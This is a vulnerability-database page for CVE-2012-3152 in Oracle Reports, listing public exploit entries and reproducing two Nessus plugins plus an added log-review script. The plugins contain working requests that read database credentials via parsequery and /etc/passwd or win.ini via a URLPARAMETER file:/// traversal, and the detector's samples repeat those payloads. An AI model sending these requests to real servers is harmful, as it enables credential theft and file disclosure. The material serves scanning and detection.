CVE-2012-3152 - Remote Security vulnerability in Oracle Fusion Middleware 11.1.1.4.0/11.1.1.6.0/11.1.2.0

CVSS 6.4 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: NONE
Tags: network, low complexity, oracle, nessus, exploit available, metasploit

Summary

Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.

Exploit-Db

  • description: Oracle Forms and Reports Remote Code Execution. CVE-2012-3152. Remote exploit for windows platform
    id: EDB-ID:31737
    last seen: 2016-02-03
    modified: 2014-02-18
    published: 2014-02-18
    reporter: metasploit
    source: https://www.exploit-db.com/download/31737/
    title: Oracle Forms and Reports - Remote Code Execution
  • description: Oracle Forms and Reports 11.1 - Remote Exploit. CVE-2012-3152. Remote exploit for jsp platform
    file: exploits/jsp/remote/31253.rb
    id: EDB-ID:31253
    last seen: 2016-02-03
    modified: 2014-01-29
    platform: jsp
    port: 80
    published: 2014-01-29
    reporter: Mekanismen
    source: https://www.exploit-db.com/download/31253/
    title: Oracle Forms and Reports 11.1 - Remote Exploit
    type: remote

Metasploit

description: This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution on the host. The showenv URL can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to write a shell from a remote URL to a known local path disclosed by the previous vulnerability. Because the local path is accessible from a URL, an attacker can perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1.
id: MSF:EXPLOIT/MULTI/HTTP/ORACLE_REPORTS_RCE
last seen: 2020-06-05
modified: 2017-08-29
published: 2014-01-30
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_reports_rce.rb
title: Oracle Forms and Reports Remote Code Execution

Nessus

  • NASL family: CGI abuses
    NASL id: ORACLE_REPORTS_PASSWORD_DISCLOSURE.NASL
    description: Nessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 73120
    published: 2014-03-20
    reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73120
    title: Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73120);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/26");
    
      script_cve_id("CVE-2012-3153");
      script_bugtraq_id(55961);
      script_xref(name:"EDB-ID", value:"31253");
    
      script_name(english:"Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure");
      script_summary(english:"Tries to exploit remote database credential exposure vulnerability");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host is running a web application that exposes database
    credentials.");
      script_set_attribute(attribute:"description", value:
    "Nessus was able to exploit a flaw in the Oracle Reports servlet
    parsequery function, and was able to retrieve the plaintext database
    credentials for one or more users. A remote attacker can exploit this
    vulnerability to gain unauthorized database access.");
      # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f");
      # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch per the vendor's advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3153");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_reports_detect.nbin");
      script_require_keys("www/oracle_reports");
      script_require_ports("Services/www", 8888);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("data_protection.inc");
    
    appname = "Oracle Reports";
    
    port = get_http_port(default:8888);
    
    install = get_install_from_kb(
      appname:'oracle_reports',
      port:port,
      exit_on_fail:TRUE
    );
    
    # try and obtain a list of keymaps
    show_keymaps_uri = install['dir'] + '/rwservlet/showmap';
    
    res = http_send_recv3(method:"GET",
                          item:show_keymaps_uri,
                          port:port,
                          exit_on_fail:TRUE);
    
    
    if ("Reports Servlet Key Map" >!< res[2]) exit(0, "Unable to access Oracle Reports showmap function via "+build_url(port:port, qs:show_keymaps_uri)+".");
    
    lines = split(res[2], sep:'\n', keep:FALSE);
    
    count = 0;
    
    custom_keymaps = make_list();
    
    ignorable_keymaps = make_list(
      '%ENV_NAME%',
      'barcodepaper',
      'barcodeweb',
      'breakbparam',
      'charthyperlink_ias',
      'charthyperlink_ids',
      'distributionpaper',
      'express',
      'orqa',
      'parmformjsp',
      'pdfenhancements',
      'report_defaultid',
      'report_secure',
      'run',
      'runp',
      'tutorial',
      'xmldata'
    );
    
    # get a list of non-default custom keymaps
    foreach line (lines)
    {
      if ("OraInstructionText" >!< line) continue;
    
      # the table alternates name and value cells; skip over the values
      count++;
      if (!(count%2)) continue;
    
      item = eregmatch(pattern:"OraInstructionText>([^<]+)<", string:line);
      if (!isnull(item) && !isnull(item[1]))
      {
        keymap = chomp(item[1]);
    
        ignore = FALSE;
        foreach map (ignorable_keymaps)
          if (map == keymap) ignore = TRUE;
        if (!ignore)
          custom_keymaps = make_list(custom_keymaps, keymap);
      }
    }
    
    if (max_index(custom_keymaps) == 0) exit(0, "Failed to access Oracle Reports showmap function at "+build_url(port:port, qs:show_keymaps_uri)+".");
    
    report = '';
    
    parsequery_uri = install['dir'] + '/rwservlet/parsequery?';
    
    foreach map (custom_keymaps)
    {
      res = http_send_recv3(method:"GET",
                            item:parsequery_uri + map,
                            port:port,
                            exit_on_fail:TRUE);
    
      item = eregmatch(pattern:"userid=([^/]+)/([^@]+)@([^ \t]+)([ \t]|$)",
                       string:res[2]);
      if (!isnull(item) && !isnull(item[1]) && !isnull(item[2]) && !isnull(item[3]))
      {
        pass = chomp(item[2]);
    
        # mask actual password except for first and last characters.
        if (strlen(pass) < 2) pass = crap(data:'*', length:6);
        else pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]);
    
        report += '\n  Username : ' + data_protection::sanitize_user_enum(users:chomp(item[1])) +
                  '\n  Password : ' + pass +
                  '\n  Database : ' + chomp(item[3]) + '\n';
      }
    }
    
    if (report != '')
    {
      report = '\nNessus was able to enumerate the following logins : \n' + report;
      if (report_verbosity > 0) security_warning(port:port, extra:report);
      else security_warning(port);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Oracle Reports", build_url(port:port, qs:install['dir'] + '/rwservlet'));
    
  • NASL family: CGI abuses
    NASL id: ORACLE_REPORTS_FILE_ACCESS.NASL
    description: Nessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve the contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution.
    last seen: 2020-03-18
    modified: 2014-03-20
    plugin id: 73119
    published: 2014-03-20
    reporter: This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/73119
    title: Oracle Reports Servlet Remote File Access
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73119);
      script_version("1.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/26");
    
      script_cve_id("CVE-2012-3152");
      script_bugtraq_id(55955);
      script_xref(name:"EDB-ID", value:"31253");
    
      script_name(english:"Oracle Reports Servlet Remote File Access");
      script_summary(english:"Tries to read a file");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a web application that has a file access
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "Nessus was able to exploit a file access vulnerability in the Oracle
    Reports servlet and retrieve the contents of a file.  A remote attacker
    could use this vulnerability to read or write arbitrary files on the
    system, ultimately leading to remote code execution.");
      # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f");
      # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch per the vendor's advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3152");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_reports_detect.nbin");
      script_require_keys("www/oracle_reports");
      script_require_ports("Services/www", 8888);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("data_protection.inc");
    
    appname = "Oracle Reports";
    
    port = get_http_port(default:8888);
    
    install = get_install_from_kb(
      appname:'oracle_reports',
      port:port,
      exit_on_fail:TRUE
    );
    
    vuln_script = install['dir'] + '/rwservlet';
    
    traversal = mult_str(str:"../", nb:15);
    
    file_list = make_list(traversal + "windows/win.ini",
                          traversal + "winnt/win.ini",
                          "c:/windows/win.ini",
                          "c:/winnt/win.ini",
                          "/etc/passwd");
    
    exploit_request = NULL;
    exploit_response = NULL;
    
    foreach file (file_list)
    {
      exploit = vuln_script + "?destype=cache&desformat=html&JOBTYPE=rwurl&URLPARAMETER=%22file:///" + file + "%22";
      res = http_send_recv3(method:"GET",
                            item:exploit,
                            port:port,
                            exit_on_fail:TRUE);
    
      if (
        # windows platforms
        (
          "win.ini" >< file &&
          (
           "[Mail]" >< res[2] ||
           "[fonts]" >< res[2] ||
           "; for 16-bit app support" >< res[2]
          )
        ) ||
        # *nix
        (
          "passwd" >< file &&
          res[2] =~ " root:.*:0:[01]:"
        )
      )
      {
        exploit_request = exploit;
        exploit_response = chomp(res[2]);
        break;
      }
    }
    
    if (!isnull(exploit_request))
    {
      report = NULL;
      filename = NULL;
      output = NULL;
      request = NULL;
      exploit_request = build_url(port:port, qs:exploit_request);
    
      if (report_verbosity > 0)
      {
        report =
          '\n' + 'Nessus was able to exploit the vulnerability with the following' +
          '\n' + 'request :' +
          '\n' +
          '\n' + '  ' + exploit_request + '\n';
    
        if (report_verbosity > 1)
        {
          output = data_protection::redact_etc_passwd(output:exploit_response);
          filename = "win.ini";
          if ("passwd" >< file) filename = "/etc/passwd";
          # attach the request that triggered the finding
          request = make_list(exploit_request);
        }
      }
    
      security_report_v4(port:port,
                         extra:report,
                         severity:SECURITY_WARNING,
                         request:request,
                         file:filename,
                         output:output);
    
      exit(0);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));
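
A log-review sketch for the rwservlet request patterns the two Nessus plugins above send (showmap, parsequery, URLPARAMETER with a file: URL) plus the showenv URL named in the Metasploit description. This is an added example, not code from Tenable, Rapid7 or Oracle; the combined access-log format, the /rwservlet/showenv path form and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# rwservlet sub-commands named on this page and what a hit suggests.
COMMANDS = {
    "showenv": "environment disclosure probe",
    "showmap": "keymap enumeration",
    "parsequery": "keymap expansion, may expose userid= (CVE-2012-3153)",
}

def classify(line):
    """Return a finding for a suspicious rwservlet request, else None."""
    m = REQ.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower().rstrip("/")
    if "/rwservlet" not in path:
        return None
    cmd = path.rsplit("/", 1)[-1]
    if cmd in COMMANDS:
        return COMMANDS[cmd]
    # Parameter names appear in mixed case, so compare them lower-cased.
    params = {k.lower(): v for k, v in parse_qsl(url.query)}
    # parse_qsl decodes once; decode again to catch double-encoded values.
    target = unquote(params.get("urlparameter", "")).strip("\"' ").lower()
    if not target:
        return None
    if target.startswith("file:"):
        return "URLPARAMETER file: read (CVE-2012-3152)"
    return "URLPARAMETER with non-file URL, review"

def scan(lines):
    """Return (line_number, finding) for every flagged log line."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Mar/2014:10:00:01 +0000] "GET /reports/rwservlet?report=sales.rdf&destype=cache HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Mar/2014:10:02:11 +0000] "GET /reports/rwservlet/showenv HTTP/1.1" 200 9000',
    '198.51.100.7 - - [01/Mar/2014:10:02:12 +0000] "GET /reports/rwservlet/showmap HTTP/1.1" 200 7000',
    '198.51.100.7 - - [01/Mar/2014:10:02:13 +0000] "GET /reports/rwservlet/parsequery?hr_key HTTP/1.1" 200 800',
    '198.51.100.7 - - [01/Mar/2014:10:02:14 +0000] "GET /reports/rwservlet?destype=cache&desformat=html&JOBTYPE=rwurl&URLPARAMETER=%22file:///etc/passwd%22 HTTP/1.1" 200 1500',
    '198.51.100.7 - - [01/Mar/2014:10:02:15 +0000] "GET /reports/rwservlet?jobtype=rwurl&urlparameter=%2522FILE%253A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%2522 HTTP/1.1" 200 400',
]
```

Hits on showmap or showenv can come from administrators, so treat the findings as triage leads and correlate them by source address and by a following parsequery or URLPARAMETER request.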
    

Packetstorm

data source: https://packetstormsecurity.com/files/download/125236/oracle_reports_rce.rb.txt
id: PACKETSTORM:125236
last seen: 2016-12-05
published: 2014-02-18
reporter: Mekanismen
source: https://packetstormsecurity.com/files/125236/Oracle-Forms-Reports-Remote-Code-Execution.html
title: Oracle Forms / Reports Remote Code Execution

Seebug

  • bulletinFamily: exploit
    description: No description provided by source.
    id: SSV:85052
    last seen: 2017-11-19
    modified: 2014-07-01
    published: 2014-07-01
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-85052
    title: Oracle Forms and Reports - Remote Code Execution
  • bulletinFamily: exploit
    description: No description provided by source.
    id: SSV:84591
    last seen: 2017-11-19
    modified: 2014-07-01
    published: 2014-07-01
    reporter: Root
    source: https://www.seebug.org/vuldb/ssvid-84591
    title: Oracle Forms and Reports 11.1 - Remote Exploit